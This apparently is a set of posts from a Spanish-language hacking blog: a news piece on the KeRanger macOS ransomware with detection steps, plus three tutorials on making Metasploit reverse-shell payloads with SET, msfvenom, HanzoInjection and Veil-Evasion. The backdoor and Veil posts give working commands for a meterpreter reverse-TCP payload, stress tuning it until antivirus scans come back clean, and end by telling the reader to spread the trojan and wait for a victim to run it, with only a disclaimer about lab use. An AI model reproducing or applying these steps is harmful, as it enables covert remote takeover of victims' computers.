Setoolkit para la creación de payloads

Buenas noches hackers! En esta entrada con un vídeo explicativo de Rabbit Hutch, se procederá a la creación de payloads y el uso del exploit/multi/handler para estar a la escucha de por un puerto determinado a la espera de una conexión inversa a nuestro host, dentro de una red LAN proporcionada por VMware y en un entorno controlado virtualizado.

SET, proporciona un gran abanico de posibilidades en cuanto a ataques de ingeniería social. Estas herramientas se integran con el framework Metasploit para así garantizar una fase de explotación en el sistema víctima. 

La creación de un payload ejecutable garantiza que ese binario malicioso mediante la ingeniería social, la víctima pueda ejecutarlo y así realizar la conexión hacia nuestro host y la obtención de meterpreter para uso de administración remota del sistema. 

Este payload generado no es FUD, por tanto existen métodos de ofuscación de código ya sea una vez compilado, o desde su código fuente. Para ello esta entrada y este vídeo es un mera introducción a malware, detectado por los diferentes AV's existentes en el mercado. Dentro de poco veremos herramientas que generan troyanos o RAT, completamente FUD o casi. 

Pero básicamente el procedimiento es el mismo. La elección de un payload y su correspondiente exploit. Herramientas como Veil-Evasion permiten la creación de payloads y poder usarlo con el exploit/multi/handler de Metasploit a la espera de la conexión (o payload) inversa dada una dirección IP pública o privada y un puerto determinado. 

También veremos más adelante de forma teórica ataques fuera de la red LAN mediante el uso de NoIP y apertura de puertos en la puerta de enlace o gateway. 

Proof of concept

Un saludo Naivenom

KeRanger: Descubierto ransomware para MAC (OS X)

Autor: Diego Jurado

Buenas a todos hackers!!

Hoy vamos a hablaros sobre un tema que nos acontece, es la noticia del momento y es que era solo cuestión de tiempo pero finalmente podemos decir: OS X ha sido vulnerado.

Hasta ahora, los usuarios de Apple podían presumir de ser uno de los únicos sistemas operativos que no había sufrido de las amenazas de Internet, pero esto ya es historia.

El 4 de marzo de este mismo mes, se registró el primer ataque de ransomware, bautizado como KeRanger dirigido a usuarios de Apple y esto es un problema, especialmente para los amantes de las descargas, ya que este ´malware´ ha sido difundido a través de software torrent y puede afectar a cualquier tipo de Mac, siempre que el usuario se encargue de ejecutar la aplicación asociada.

El único ransomware conocido para OS X hasta ahora fue descubierto por Kasperky Lab en 2014, fue denominado como FileCoder y estaba incompleto, mientras que KeRanger , según los investigadores de Palo Alto, se trata de "el primer ransomware completamente funcional que se ha visto en la plataforma OS X".

¿Qué es un Ransomware?

Un ransomware (del inglés ransom = rescate / ware = software) se trata de un tipo de programa informático malicioso, que encripta y restringe el acceso generalmente a archivos o partes del sistema que ha sido vulnerado.

Una vez se tienen los datos encriptados, la única forma de recuperar estos archivos es mediante el pago de un rescate que se le pide al usuario. 

Esto supone un daño crítico, especialmente a empresas u organizaciones que dependen de sus archivos y que se han visto en más de una ocasión a pagar dicho rescate, como por ejemplo hace un mes, un hospital en los Angeles se vio obligado a pagar 40 bitcoins (equivalente a $16700) para recuperar parte de sus sistema que fue afectado por un ramsomware.

KeRanger Ransomware

Para la propagación de este ransomware, los atacantes se aprovecharon de una actualización de Transmission, un cliente de BitTorrent para OS X que llevaba dos años sin actualizarse.

Los creadores inyectaron KeRanger en dos instaladores de la versión 2.90, aprovechando que esta es una aplicación de código abierto (open source).

La aplicación infectada con KeRanger estaba firmada con un certificado de desarrollador de Apple, que lograba evitar que Gatekeeper (mecanismo de seguridad integrado en OS X) detectase la aplicación como peligrosa y rechazase su instalación.

Cuando un usuario instala la aplicación, un ejecutable embebido en la misma, pasa a formar parte del sistema. Es entonces cuando KeRanger (a los 3 días aproximadamente) se conecta con sus servidores de control y comando en la conocida red Tor y comienza a cifrar ciertos tipos de documentos y archivos de datos del sistema.

Estos son algunos de los tipos de documentos que se cifran: 

Tras finalizar este proceso, se solicita automáticamente al usuario afectado que pague un BitCoin ($400 aproximadamente) a una dirección especifica para poder recuperar sus documentos. 

Se dice que KeRanger sigue en proceso de desarrollo, y este malware intenta cifrar tambien el contenido de las copias de seguridad de Time Machine para prevenir recuperar información desde sus copias de seguridad. 

¿Como detectarlo y como protegerse?

Como era de esperar, la reacción ha sido rápida, y desde Transmission ya se han dado cuenta, y han lanzado una nueva version 2.92, donde se ha eliminado el ransomware. Esta actualización ha pasado a ser obligatoria para todos los usuarios  de la aplicación.

Pero,  ¿como podemos saber si estamos infectados?, ¿como nos protegemos?

Si vamos a Transmission y hacemos clic en Mostrar contenido del paquete con el segundo botón del ratón, podremos observar que hay un archivo extra denominado General.rtf en la ruta:

Transmission.app/Content/MacOS/Transmission. 

Este archivo de texto no es más que un ejecutable empaquetado con UPX 3.91.

Cuando el usuario infectado ejecuta la aplicación, dicho archivo se copia en la ubicación: 

Library/kernel_service y se ejecuta el servicio antes de que ninguna interfaz aparezca para recolectar información del modelo de Mac y su identificador UUID.

Estos datos se envían a un servidor externo, y este devuelve una respuesta informando sobre el rescate.

Si queremos saber si hemos sido infectados, debemos seguir los siguientes pasos: 

• Abrir Terminal o Finder y verificar si tenemos el archivo General.rtf en nuestro equipo. Para ello basta con mirar las rutas: 

          /Applications/Transmission.app/Contents/Resources/General.rtf           /Volumes/Transmission/Transmission.app/Contents/Resources/

• Mediante el Monitor de actividad, deberemos verificar los procesos que están activos. Si encontramos uno llamado "kernel_service" ejecutandose, deberemos hacer doble click sobre él, ir a la opción de Archivos y puertos abiertos (Open Files and Ports) y ver si hay un archivo con el nombre: /Users/<username>/Library/kernel_service , en este caso, forzaremos el cierre.

• Por último, comprobaremos si los archivos: kernel_pid, kernel_time, kernel_complete o kernel_service existen en la carpeta Library directory, en este caso los eliminaremos.

Recomendaciones

Desde aqui, recomendamos siempre tener una copia de seguridad disponible, por si alguna vez sufrimos este tipo de ataques, con ella estaremos mucho más seguros.

Es importante concienciarse de que todos nuestros datos están expuestos, y de que todos somos vulnerables. 

Este es el primer caso de ransomware que hace que el Mac (OS X) ya no pueda mantener su reputación como bastión de seguridad por encima de Windows.

"Pienso que los virus informáticos muestran la naturaleza humana: la única forma de vida que hemos creado hasta el momento es puramente destructiva"  - Stephen Hawking -

Backdoor 100% indetectable con HanzoInjection

Autor: Diego Jurado

Buenas de nuevo hackers!


En el día de hoy, os traigo una nueva prueba de concepto muy interesante. Lo que haremos será generar un backdoor 100% indetectable para los antivirus, con la ayuda de HanzoInjection.
Para los que no saben que es un backdoor (puerta trasera), se puede definir como una secuencia de código que evita los sistemas de seguridad, permitiendo a un atacante acceder al sistema de forma remota. Las puertas traseras pueden ser utilizadas para fines maliciosos y de espionaje.
NOTA: Antes de comenzar, saber que vamos a utilizar una máquina en Kali-Linux y otra Windows.

PASO 1: 

Lo primero que haremos será crear un simple backdoor con la herramienta msfvenom. Como ya sabemos, este backdoor es detectable por algunos antivirus, por lo tanto no será completamente útil a la hora de realizar un ataque.
Con este comando, lo que haremos será utilizar:

• Payload meterpreter con conexión inversa.

• Lhost= 192.168.1.53 (IP del atacante).

• Lport=4444 (Puerto por el que establecemos la escucha).

• evil.bin = Fichero binario creado (en carpeta root/Escritorio).

Introducimos el siguiente comando en la consola:
> msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.53 lport=4444 -t raw -o /root/Escritorio/evil.bin

PASO 2:

En este punto, lo analizaremos con cualquier escaner online (excepto virustotal), en nuestro caso hemos utilizado: www.nodistribute.com , (otra buena opción es www.metascan-online.com ).

Podemos observar que el backdoor es detectado por 2/35 antivirus, no es mucho, pero queremos que sea 100% indetectable.

PASO 3:

Ya tenemos nuestro fichero binario (evil.bin) , lo llevaremos a una máquina WINDOWS. 

Ahora utilizaremos HanzoInjection (https://www.dropbox.com/s/yhtysslpo660nj0/hanzoInjection-master.zip?dl=0 ).

Únicamente debemos acceder a la carpeta donde se encuentra el ejecutable (teniendo el fichero evil.bin en la misma ruta) y ejecutar el siguiente comando:

> HanzoInjection.exe -p evil.bin -o evilInject.cs

Así creamos un archivo de código (.cs) que podrá ser convertido a (.exe).

PASO 4:

Lo siguiente que haremos será volver a Kali-Linux y crear un proyecto con monodevelop.

Esta herramienta nos permite transformar el código (.cs) en un archivo ejecutable (.exe).

Primero instalamos monodevelop:

> apt-get install monodevelop 

Creamos un proyecto nuevo con el nombre que queramos, en nuestro caso se ha llamado EvilProyect: 

Ahora deberemos compilar o construir el código, pero nos dará el siguiente error:

Para quitarlo accedemos a Proyecto -> Opciones de EvilProyect y seleccionamos la opción "Permitir código inseguro":

Un nuevo error relacionado con las librerias xml aparecerá. Para quitarlo iremos a Referencias -> Editar Referencias y añadiremos la libreria System.xml:

Compilamos el código correctamente y se habrá creado en la carpeta del proyecto nuestro ejecutable (EvilProyect.exe):

PASO 5:

Volvemos a escanear el archivo (EvilProyect.exe) y vemos ha quedado completamente limpio (100% Indetectable!!):

PASO 6:
Por último, utilizando la herramienta metasploit en Kali-Linux  y establecemos una conexión a la escucha utilizando el exploit multi/handler y el payload windows/meterpreter/reverse_tcp porsupuesto utilizando el mismo puerto/ip que usamos para la creación del backdoor.

En este punto, solo quedará propagar nuestro troyano y esperar a que la víctima lo ejecute. Automáticamente conseguiremos una sesión de meterpreter (shell) como vimos en anteriores post.
 


Espero que les haya gustado el post, y como decimos siempre, la prueba de concepto se ha realizado sobre máquinas virtualizadas y para fines educativos, no nos hacemos responsables de su mal uso.


"Es extraña la ligereza con la que los malvados creen que todo les saldrá bien" - Victor Hugo

Veil-Evasion y metasploit

Buenas tardes hackers!

En esta prueba de concepto realizada en un entorno virtualizado, se conseguirá una sesión meterpreter a través de un exploit(multi/handler) y la vulnerabilidad crítica basada en la persona con un windows 7. Para ello se usara una herramienta llamada Veil-Framework, donde generaremos un payload que tiene como objetivo ejecutarse en la máquina víctima para realizar la acción maliciosa y bastante indetectable por la mayoría de los antivirus. Instalamos la herramienta en Kali clonando desde github.

Una vez tengamos la carpeta de Veil entramos y ejecutamos /Install.sh. Recomiendo la lectura en github de los pasos y las condiciones que se han de cumplir antes de instalar la herramienta, para que no exista ningún tipo error.

Una vez instalado nos situamos en la carpeta Veil-Evasion y ejecutamos previamente dando los permisos necesarios para la ejecución. Existen 49 payloads. El comando a usar es ./Veil-Evasion.py.

Podemos apreciar los distintos payload que existen, dependiendo del entorno en el que se ejecuten.

Configuramos uno de los payload más interesantes, llamado meterpreter con conexión inversa. El atacante lanzara el exploit y permanecerá a la escucha de conexiones hasta que la víctima ejecute el código malicioso y el payload se conectara a la dirección IP asociado a un puerto determinado.
IP--->172.16.22.133 (atacante)
Puerto--->4444 (atacante)
De esta forma ya tendríamos configurado nuestro payload que enviaremos a través de ingeniería social a nuestra víctima.

El archivo que genera es un .bat (backdor.bat) en la carpeta veil-output. Para que la victima pueda ejecutarlo sera necesario convertirlo en un .exe. Existen muchos programas para hacerlo, en esta PoC se usa el Bat To Exe Converter v2.4.

Una vez convertido el .exe lo analizamos con www.scan4you.net y nos da un resultado de detecciones de antivirus por firmas de 5/35, no esta nada mal.

Ahora ya creado una parte importante y fundamental que es la conexión, necesitamos abrir Metasploit (msfconsole) que será la parte que actuara como si de un servidor se tratase a la escucha de conexiones.
Ejecutamos el comando msfconsole, y usamos el exploit multi/handler que servirá con el fin de que la víctima ejecute el archivo y el payload realice la conexión inversa al atacante, dándole acceso a la maquina.
Una vez obtenido la sesión meterpreter, la maquina victima esta comprometida donde se puede realizar acciones de todo tipo, ya sea una linea de comandos como un keylogger.

P.D No me hago responsable del mal uso que se le de a esta PoC, es de carácter educativo y esta realizado en un entorno virtualizado. No seáis malos!!